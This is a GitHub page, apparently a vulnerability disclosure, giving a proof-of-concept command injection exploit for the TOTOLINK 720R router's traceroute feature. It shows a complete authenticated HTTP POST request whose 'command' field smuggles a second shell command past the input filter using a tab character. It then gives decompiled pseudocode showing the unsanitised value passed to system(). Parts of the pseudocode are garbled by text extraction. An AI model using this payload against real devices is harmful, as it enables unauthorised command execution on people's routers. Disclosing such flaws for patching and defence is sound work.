☐ Jfox816 / TOTOLINK-720R (Public) <> Code Issues **11** Pull requests Actions Security ✓ Insights **ጕ** 177ee39a5a ▼ TOTOLINK-720R / totolink 720 RCode Execution2.md Jfox816 Update totolink 720 RCode Execution2.md (1) History ৪ 1 contributor 32 lines (28 sloc) | 1.39 KB Exploit Title: Totolink 720 has a code execution vulnerability Version: V4.1.5cu.374 Date:2022/08/16 Exploit Author:xiaohu816 Vendor Homepage:https://www.totolink.net/ POC: After the administrator logs in, enter the "system tools" - > "route tracking" page to execute the command Execute TLS > / TMP / 2.txt POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.0.1 Content-Length: 58 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.0.1 Referer: http://192.168.0.1/advance/traceroute.html?time=1659892330160 Accept-Encoding: gzip, deflate Accept-Language: en-US, en; q=0.9 Cookie: SESSION_ID=2:1591951611:2 Connection: close

```
{"command": "aaaa\tls>/tmp/2.txt", "num": "4", "topicurl": "setTracerouteCfg"}
```

Analysis Report:

In the processing function of setting the routing parameters of the router, the input IP address is simply checked and then written into V6 through sprintf, and then the system is called for execution

```
IDA View-A 🖂 👊 Pseudocode-U 🐸 🔯 Pseudocode-B 🖾 🔯 Pseudocode-A 🖾 🖼 Strings
1 int __fastcall setTracerouteCfg(int a1)
 3 const char *Var; // $s1
4 int v3; // $v0
 5 int v4; // $s0
 6 char v6[128]; // [sp+18h] [-80h] BYREF
 7
8 memset(v6, 0, sizeof(v6));
9 Var = (const char *)websGetVar(a1, "command", "www.baidu.com");
10 v3 = websGetVar(a1, "num", &byte_42FF00);
11 \vee4 = atoi(\vee3);
12 if ( !Validity_check(Var) )
13 {
      sprintf(v6, "traceroute -w 4 -m %d %s&>/var/log/traceRouteLog", v4, Val);
14
15
      system(v6);
16 }
17
   sub_42A7A0(&word_42EC2C, "reserv");
18 return 1;
19 }
```

You can bypass the check by \ t to realize command injection